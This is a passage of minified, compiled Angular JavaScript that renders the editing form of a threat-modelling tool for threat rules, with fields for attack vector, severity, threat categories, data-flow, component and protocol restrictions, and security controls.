e=Ye();bt(0),s(1,"\n              "),m(2,"mat-form-field",51),s(3,"\n                "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.SenderInterfaceRestriction.Property.ID=n)}),s(9,"\n                  "),ne(10,mIe,4,2,"mat-optgroup",6),s(11,"\n                "),u(),s(12,"\n              "),u(),s(13,"\n              "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n              "),ne(17,uIe,4,1,"ng-container",16),s(18,"\n              "),ne(19,fIe,7,2,"ng-container",16),s(20,"\n            "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.SenderInterfaceRestriction.Property.ID),C(2),V("ngForOf",i.GetAvailableInterfacePropertyGroups(e)),C(5),ct("\n                ",e.PropertyRest.ComparisonType,"\n              "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function _Ie(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function gIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function CIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.ReceiverInterfaceRestriction.Property,r))}),s(1,"\n                      "),ne(2,_Ie,3,3,"ng-container",16),s(3,"\n                      "),ne(4,gIe,2,1,"ng-container",16),s(5,"\n                    "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function yIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                    "),ne(2,CIe,6,3,"mat-option",47),s(3,"\n                  "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function bIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.ReceiverInterfaceRestriction.Property.Value=n)}),u(),s(3,"\n              "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.ReceiverInterfaceRestriction.Property.Value)}}function MIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function vIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.ReceiverInterfaceRestriction.Property,n.target.value))}),s(3,"\n                  "),ne(4,MIe,3,4,"option",11),s(5,"\n                "),u(),s(6,"\n              "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.ReceiverInterfaceRestriction.Property.Value),C(2),V("ngForOf",i.GetLMHValues())}}function AIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-form-field",51),s(3,"\n                "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.ReceiverInterfaceRestriction.Property.ID=n)}),s(9,"\n                  "),ne(10,yIe,4,2,"mat-optgroup",6),s(11,"\n                "),u(),s(12,"\n              "),u(),s(13,"\n              "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n              "),ne(17,bIe,4,1,"ng-container",16),s(18,"\n              "),ne(19,vIe,7,2,"ng-container",16),s(20,"\n            "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.ReceiverInterfaceRestriction.Property.ID),C(2),V("ngForOf",i.GetAvailableInterfacePropertyGroups(e)),C(5),ct("\n                ",e.PropertyRest.ComparisonType,"\n              "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function TIe(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=B().$implicit;C(1),ct("\n              ",e.IsOR?"OR":"AND","\n            ")}}function EIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n            "),m(2,"mat-form-field",4),s(3,"\n              "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n              "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n              "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.NodeNumber=n)}),s(11,"\n                "),ne(12,H8e,2,2,"mat-option",11),s(13,"\n              "),u(),s(14,"\n              "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(B(3).RemoveDFDNodeRestriction(r))}),oe(16,"translate"),s(17,"\n                "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n              "),u(),s(21,"\n            "),u(),s(22,"\n            "),m(23,"mat-form-field",51),s(24,"\n              "),m(25,"mat-label"),s(26),oe(27,"translate"),u(),s(28,"\n              "),m(29,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(30,"\n                "),ne(31,U8e,3,4,"mat-option",47),s(32,"\n              "),u(),s(33,"\n            "),u(),s(34,"\n            "),s(35,"\n            "),ne(36,Y8e,21,8,"ng-container",16),s(37,"\n            "),s(38,"\n            "),ne(39,Z8e,15,8,"mat-form-field",60),s(40,"\n            "),s(41,"\n            "),ne(42,sIe,18,7,"ng-container",16),s(43,"\n            "),s(44,"\n            "),ne(45,pIe,21,8,"ng-container",16),s(46,"\n            "),s(47,"\n            "),ne(48,AIe,21,8,"ng-container",16),s(49,"\n\n            "),ne(50,TIe,2,1,"button",49),s(51,"\n          "),u()}if(2&t){const e=a.$implicit,i=a.last,n=B(3);C(2),ri("padding-left",n.GetLayerPadding(e)),C(3),ke(re(6,16,"general.Element")),C(3),V("ngModel",e.Layer),C(2),V("value",e.NodeNumber),C(2),V("ngForOf",n.GetRuleElements()),C(3),at("matTooltip",re(16,18,"general.Delete")),C(11),ke(re(27,20,"general.Type")),C(3),V("value",e.RestType),C(2),V("ngForOf",n.GetAvailableRestrictionsTypes(e)),C(5),V("ngIf",1==e.RestType),C(3),V("ngIf",2==e.RestType),C(3),V("ngIf",3==e.RestType),C(3),V("ngIf",10==e.RestType),C(3),V("ngIf",11==e.RestType),C(2),V("ngIf",!i)}}function DIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n      "),m(2,"div"),s(3,"\n        "),m(4,"mat-form-field",4),s(5,"\n          "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n          "),m(10,"mat-select",10),he("valueChange",function(n){return be(e),Me(B(2).threatRule.DFDRestriction.Target=n)}),s(11,"\n            "),ne(12,O8e,2,2,"mat-option",11),s(13,"\n          "),u(),s(14,"\n        "),u(),s(15,"\n        "),it(16,"br"),s(17,"\n        "),ne(18,B8e,25,10,"ng-container",45),s(19,"\n        "),m(20,"button",55),he("click",function(){be(e);const n=B(2);return Me(n.threatRule.DFDRestriction.AppliesReverse=!n.threatRule.DFDRestriction.AppliesReverse)}),oe(21,"translate"),s(22,"\n          "),m(23,"mat-icon",56),s(24,"swap_horiz"),u(),s(25,"\n        "),u(),s(26,"\n        "),it(27,"br"),s(28),oe(29,"translate"),m(30,"button",43),he("click",function(){return be(e),Me(B(2).AddDFDNodeRestriction())}),oe(31,"translate"),s(32,"\n          "),m(33,"mat-icon"),s(34,"add"),u(),s(35,"\n        "),u(),s(36,"\n        "),m(37,"span",44),s(38),u(),s(39,"\n        "),m(40,"div"),s(41,"\n          "),ne(42,EIe,52,22,"div",45),s(43,"\n        "),u(),s(44,"\n      "),u(),s(45,"\n    "),u()}if(2&t){const e=B(2);C(7),ke(re(8,13,"general.Target")),C(3),V("value",e.threatRule.DFDRestriction.Target),C(2),V("ngForOf",e.GetRuleElements()),C(6),V("ngForOf",e.threatRule.DFDRestriction.NodeTypes),C(2),at("matTooltip",re(21,15,"pages.config.threatrule.applyReverse")),C(3),Ct("btn-selected-light",!e.theme.IsDarkMode&&e.threatRule.DFDRestriction.AppliesReverse)("btn-selected-dark",e.theme.IsDarkMode&&e.threatRule.DFDRestriction.AppliesReverse),C(5),ct("\n        ",re(29,17,"properties.Restrictions")," \n        "),C(2),at("matTooltip",re(31,19,"general.Add")),C(8),ke(e.GetRestrictionString()),C(4),V("ngForOf",e.threatRule.DFDRestriction.NodeRestrictions)}}function xIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ct("\n                ",re(2,2,i.GetRestrictionTypeName(e)),"\n              ")}}function wIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function IIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function RIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n                    "),ne(2,wIe,3,3,"ng-container",16),s(3,"\n                    "),ne(4,IIe,2,1,"ng-container",16),s(5,"\n                  "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function SIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                  "),ne(2,RIe,6,3,"mat-option",47),s(3,"\n                "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function kIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n            "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PropertyRest.Value)}}function PIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function OIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n                "),ne(4,PIe,3,4,"option",11),s(5,"\n              "),u(),s(6,"\n            "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PropertyRest.Value),C(2),V("ngForOf",i.GetLMHValues())}}function NIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"mat-form-field",51),s(3,"\n              "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n              "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PropertyRest.ID=n)}),s(9,"\n                "),ne(10,SIe,4,2,"mat-optgroup",6),s(11,"\n              "),u(),s(12,"\n            "),u(),s(13,"\n            "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n            "),ne(17,kIe,4,1,"ng-container",16),s(18,"\n            "),ne(19,OIe,7,2,"ng-container",16),s(20,"\n          "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.PropertyRest.ID),C(2),V("ngForOf",i.GetAvailablePropertyGroups(e)),C(5),ct("\n              ",e.PropertyRest.ComparisonType,"\n            "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function LIe(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=B().$implicit;C(1),ct("\n            ",e.IsOR?"OR":"AND","\n          ")}}function zIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n          "),m(2,"mat-form-field",4),s(3,"\n            "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n            "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n            "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(11,"\n              "),ne(12,xIe,3,4,"mat-option",47),s(13,"\n            "),u(),s(14,"\n            "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(B(3).RemoveComponentRestriction(r))}),oe(16,"translate"),s(17,"\n              "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n            "),u(),s(21,"\n          "),u(),s(22,"\n          "),s(23,"\n          "),ne(24,NIe,21,8,"ng-container",16),s(25,"\n          "),ne(26,LIe,2,1,"button",49),s(27,"\n        "),u()}if(2&t){const e=a.$implicit,i=a.last,n=B(3);C(2),ri("padding-left",n.GetLayerPadding(e)),C(3),ke(re(6,9,"general.Type")),C(3),V("ngModel",e.Layer),C(2),V("value",e.RestType),C(2),V("ngForOf",n.GetAvailableRestrictionsTypes(e)),C(3),at("matTooltip",re(16,11,"general.Delete")),C(9),V("ngIf",1==e.RestType),C(2),V("ngIf",!i)}}function WIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n      "),m(2,"mat-form-field",41),s(3,"\n        "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n        "),it(8,"input",42),s(9,"\n      "),u(),s(10,"\n      "),it(11,"br"),s(12),oe(13,"translate"),m(14,"button",43),he("click",function(){return be(e),Me(B(2).AddComponentRestriction())}),oe(15,"translate"),s(16,"\n        "),m(17,"mat-icon"),s(18,"add"),u(),s(19,"\n      "),u(),s(20,"\n      "),m(21,"span",44),s(22),u(),s(23,"\n      "),m(24,"div"),s(25,"\n        "),ne(26,zIe,28,13,"div",45),s(27,"\n      "),u(),s(28,"\n    "),u()}if(2&t){const e=B(2);C(5),ke(re(6,8,"properties.ComponentType")),C(3),at("matTooltip",null==e.selectedComponentType?null:e.selectedComponentType.Name),V("spellcheck",e.dataService.HasSpellCheck)("value",null==e.selectedComponentType?null:e.selectedComponentType.Name),C(4),ct("\n      ",re(13,10,"properties.Restrictions")," \n      "),C(2),at("matTooltip",re(15,12,"general.Add")),C(8),ke(e.GetRestrictionString()),C(4),V("ngForOf",e.threatRule.ComponentRestriction.DetailRestrictions)}}function FIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ct("\n                ",re(2,2,i.GetRestrictionTypeName(e)),"\n              ")}}function VIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function BIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function HIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n                    "),ne(2,VIe,3,3,"ng-container",16),s(3,"\n                    "),ne(4,BIe,2,1,"ng-container",16),s(5,"\n                  "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function UIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                  "),ne(2,HIe,6,3,"mat-option",47),s(3,"\n                "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function qIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n            "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PropertyRest.Value)}}function GIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function jIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n                "),ne(4,GIe,3,4,"option",11),s(5,"\n              "),u(),s(6,"\n            "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PropertyRest.Value),C(2),V("ngForOf",i.GetLMHValues())}}function QIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"mat-form-field",51),s(3,"\n              "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n              "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PropertyRest.ID=n)}),s(9,"\n                "),ne(10,UIe,4,2,"mat-optgroup",6),s(11,"\n              "),u(),s(12,"\n            "),u(),s(13,"\n            "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n            "),ne(17,qIe,4,1,"ng-container",16),s(18,"\n            "),ne(19,jIe,7,2,"ng-container",16),s(20,"\n          "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.PropertyRest.ID),C(2),V("ngForOf",i.GetAvailablePropertyGroups(e)),C(5),ct("\n              ",e.PropertyRest.ComparisonType,"\n            "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function $Ie(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=B().$implicit;C(1),ct("\n            ",e.IsOR?"OR":"AND","\n          ")}}function KIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n          "),m(2,"mat-form-field",4),s(3,"\n            "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n            "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n            "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(11,"\n              "),ne(12,FIe,3,4,"mat-option",47),s(13,"\n            "),u(),s(14,"\n            "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(B(3).RemoveProtocolRestriction(r))}),oe(16,"translate"),s(17,"\n              "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n            "),u(),s(21,"\n          "),u(),s(22,"\n          "),s(23,"\n          "),ne(24,QIe,21,8,"ng-container",16),s(25,"\n          \n          "),ne(26,$Ie,2,1,"button",49),s(27,"\n        "),u()}if(2&t){const e=a.$implicit,i=a.last,n=B(3);C(2),ri("padding-left",n.GetLayerPadding(e)),C(3),ke(re(6,9,"general.Type")),C(3),V("ngModel",e.Layer),C(2),V("value",e.RestType),C(2),V("ngForOf",n.GetAvailableRestrictionsTypes(e)),C(3),at("matTooltip",re(16,11,"general.Delete")),C(9),V("ngIf",1==e.RestType),C(2),V("ngIf",!i)}}function XIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n      "),m(2,"mat-form-field",41),s(3,"\n        "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n        "),it(8,"input",42),s(9,"\n      "),u(),s(10,"\n      "),it(11,"br"),s(12),oe(13,"translate"),m(14,"button",43),he("click",function(){return be(e),Me(B(2).AddProtocolRestriction())}),oe(15,"translate"),s(16,"\n        "),m(17,"mat-icon"),s(18,"add"),u(),s(19,"\n      "),u(),s(20,"\n      "),m(21,"span",44),s(22),u(),s(23,"\n      "),m(24,"div"),s(25,"\n        "),ne(26,KIe,28,13,"div",45),s(27,"\n      "),u(),s(28,"\n    "),u()}if(2&t){const e=B(2);C(5),ke(re(6,8,"general.Protocol")),C(3),at("matTooltip",null==e.selectedProtocol?null:e.selectedProtocol.Name),V("spellcheck",e.dataService.HasSpellCheck)("value",null==e.selectedProtocol?null:e.selectedProtocol.Name),C(4),ct("\n      ",re(13,10,"properties.Restrictions")," \n      "),C(2),at("matTooltip",re(15,12,"general.Add")),C(8),ke(e.GetRestrictionString()),C(4),V("ngForOf",e.threatRule.ProtocolRestriction.DetailRestrictions)}}function YIe(t,a){if(1&t){const e=Ye();m(0,"button",23),he("click",function(){const r=be(e).$implicit;return Me(B(2).AddExistingControl(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.Name)}}function JIe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",61),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedControl=r)}),s(1,"\n            "),m(2,"mat-icon",62),s(3,"arrow_right"),u(),s(4,"\n            "),m(5,"div",63),s(6),oe(7,"translate"),u(),s(8,"\n            "),m(9,"button",64),he("click",function(){const r=be(e).$implicit;return Me(B(2).RemoveControl(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n            "),m(14,"button",65),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteControl(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n          "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedControl===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedControl===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,8,e.Name)),C(3),at("matTooltip",re(10,10,"general.Remove")),C(5),at("matTooltip",re(15,12,"general.Delete"))}}function ZIe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",67),he("click",function(){const r=be(e).$implicit;return Me(B(3).selectedControl=r)}),s(1,"\n              "),m(2,"mat-icon",62),s(3,"security"),u(),s(4,"\n              "),m(5,"div",63),s(6),oe(7,"translate"),u(),s(8,"\n            "),u()}if(2&t){const e=a.$implicit,i=B(3);Ct("highlight-light",i.selectedControl===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedControl===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,6,e.Name))}}function e5e(t,a){if(1&t&&(bt(0),s(1,"\n            "),it(2,"mat-divider"),s(3,"\n            "),m(4,"div",20),s(5),oe(6,"translate"),u(),s(7,"\n            "),ne(8,ZIe,9,8,"mat-list-item",66),s(9,"\n          "),Mt()),2&t){const e=B(2);C(5),za("",e.threatRule.AttackVector.Name," ",re(6,3,"general.Controls"),""),C(3),V("ngForOf",e.GetVectorControls())}}function t5e(t,a){if(1&t&&(m(0,"div",68),s(1,"\n          "),it(2,"app-control",69),s(3,"\n        "),u()),2&t){const e=B(2);C(2),V("control",e.selectedControl)("canEdit",!1)("canEditName",!0)("canEditGroup",!0)}}const i5e=function(){return[1,2]};function a5e(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-checkbox",2),he("ngModelChange",function(n){return be(e),Me(B().threatRule.IsActive=n)}),s(3),oe(4,"translate"),u(),s(5,"\n  "),it(6,"br"),s(7,"\n  "),ne(8,i8e,10,6,"mat-form-field",3),s(9,"\n  "),m(10,"div"),s(11,"\n    "),m(12,"mat-form-field",4),s(13,"\n      "),m(14,"mat-label"),s(15),oe(16,"translate"),u(),s(17,"\n      "),m(18,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().threatRule.AttackVector=n)})("selectionChange",function(n){return be(e),Me(B().OnAttackVectorChanged(n.value))}),s(19,"\n        "),m(20,"mat-option"),s(21),oe(22,"translate"),u(),s(23,"\n        "),ne(24,n8e,4,2,"mat-optgroup",6),s(25,"\n      "),u(),s(26,"\n      "),m(27,"button",7),he("click",function(n){return be(e),B().EditAttackVector(),Me(n.stopPropagation())}),oe(28,"translate"),s(29,"\n        "),m(30,"mat-icon"),s(31,"edit"),u(),s(32,"\n      "),u(),s(33,"\n      "),m(34,"button",8),he("click",function(n){return be(e),B().AddAttackVector(),Me(n.stopPropagation())}),oe(35,"translate"),s(36,"\n        "),m(37,"mat-icon"),s(38,"add"),u(),s(39,"\n      "),u(),s(40,"\n    "),u(),s(41,"\n    "),m(42,"mat-form-field",9),s(43,"\n      "),m(44,"mat-label"),s(45),oe(46,"translate"),u(),s(47,"\n      "),m(48,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().threatRule.Severity=n)}),s(49,"\n        "),m(50,"mat-option"),s(51),oe(52,"translate"),u(),s(53,"\n        "),ne(54,o8e,3,4,"mat-option",11),s(55,"\n      "),u(),s(56,"\n    "),u(),s(57,"\n    "),ne(58,s8e,20,4,"mat-accordion",12),s(59,"\n    "),m(60,"mat-form-field",13),s(61,"\n      "),m(62,"mat-label"),s(63),oe(64,"translate"),u(),s(65,"\n        "),m(66,"mat-select",14),he("valueChange",function(n){return be(e),Me(B().threatRule.ThreatCategories=n)}),s(67,"\n          "),ne(68,l8e,4,2,"mat-optgroup",6),s(69,"\n        "),u(),s(70,"\n    "),u(),s(71,"\n    "),m(72,"mat-form-field",13),s(73,"\n      "),m(74,"mat-label"),s(75),oe(76,"translate"),u(),s(77,"\n      "),m(78,"textarea",15),he("ngModelChange",function(n){return be(e),Me(B().threatRule.Description=n)}),u(),s(79,"\n    "),u(),s(80,"\n    "),ne(81,m8e,16,5,"ng-container",16),s(82,"\n    "),m(83,"mat-form-field",4),s(84,"\n      "),m(85,"mat-label"),s(86),oe(87,"translate"),u(),s(88,"\n      "),m(89,"mat-select",14),he("valueChange",function(n){return be(e),Me(B().threatRule.OverridenRules=n)}),s(90,"\n        "),ne(91,h8e,4,2,"mat-optgroup",6),s(92,"\n      "),u(),s(93,"\n    "),u(),s(94,"\n    "),it(95,"br"),s(96,"\n    "),ne(97,P8e,29,14,"div",16),s(98,"\n    "),ne(99,DIe,46,21,"div",16),s(100,"\n    "),ne(101,WIe,29,14,"div",16),s(102,"\n    "),ne(103,XIe,29,14,"div",16),s(104,"\n    "),m(105,"div",17),s(106,"\n      "),m(107,"div",18),s(108,"\n        "),m(109,"mat-list",19),he("cdkDropListDropped",function(n){be(e);const r=B();return Me(r.dropControl(n,r.GetControls()))}),s(110,"\n          "),m(111,"div",20),s(112),oe(113,"translate"),m(114,"button",21),oe(115,"translate"),m(116,"mat-icon"),s(117,"add"),u()(),s(118,"\n            "),m(119,"mat-menu",null,22),s(121,"\n              "),m(122,"button",23),he("click",function(){return be(e),Me(B().AddControl())}),s(123),oe(124,"translate"),u(),s(125,"\n              "),m(126,"button",24),s(127),oe(128,"translate"),u(),s(129,"\n            "),u(),s(130,"\n            "),m(131,"mat-menu",null,25),s(133,"\n              "),ne(134,YIe,2,1,"button",26),s(135,"\n            "),u(),s(136,"\n          "),u(),s(137,"\n          "),ne(138,JIe,19,14,"mat-list-item",27),s(139,"\n          "),ne(140,e5e,10,5,"ng-container",16),s(141,"\n        "),u(),s(142,"\n      "),u(),s(143,"\n      "),m(144,"div",28),s(145,"\n        "),ne(146,t5e,4,4,"div",29),s(147,"\n      "),u(),s(148,"\n    "),u(),s(149,"\n  "),u(),s(150,"\n"),u()}if(2&t){const e=Ti(120),i=Ti(132),n=B();let r;Ct("disable",!n.canEdit),C(2),V("ngModel",n.threatRule.IsActive),C(1),ke(re(4,48,"properties.IsActive")),C(5),V("ngIf",n.canEditName),C(2),Ct("disable",!n.threatRule.IsActive),C(5),ke(re(16,50,"general.AttackVector")),C(3),at("matTooltip",null==n.threatRule.AttackVector?null:n.threatRule.AttackVector.Name),V("value",n.threatRule.AttackVector),C(3),ke(re(22,52,"properties.selectNone")),C(3),V("ngForOf",n.GetAttackVectorGroups()),C(3),at("matTooltip",re(28,54,"general.Edit")),V("disabled",!n.threatRule.AttackVector),C(7),at("matTooltip",re(35,56,"general.Add")),C(11),ke(re(46,58,"properties.Severity")),C(3),V("value",n.threatRule.Severity),C(3),ke(re(52,60,"properties.selectNone")),C(3),V("ngForOf",n.GetSeverityTypes()),C(4),V("ngIf",n.showAttackVector&&n.threatRule.AttackVector),C(5),ke(re(64,62,"general.ThreatCategories")),C(3),V("value",n.threatRule.ThreatCategories),C(2),V("ngForOf",n.GetThreatCategoryGroups()),C(7),ke(re(76,64,"properties.Description")),C(3),V("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.threatRule.Description),C(3),V("ngIf",kr(76,i5e).includes(n.threatRule.RuleType)),C(5),ke(re(87,66,"properties.OverridenRules")),C(3),V("value",n.threatRule.OverridenRules),C(2),V("ngForOf",n.GetAvailableThreatRuleGroups()),C(6),V("ngIf",1==n.threatRule.RuleType),C(2),V("ngIf",2==n.threatRule.RuleType),C(2),V("ngIf",3==n.threatRule.RuleType),C(2),V("ngIf",4==n.threatRule.RuleType),C(6),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMod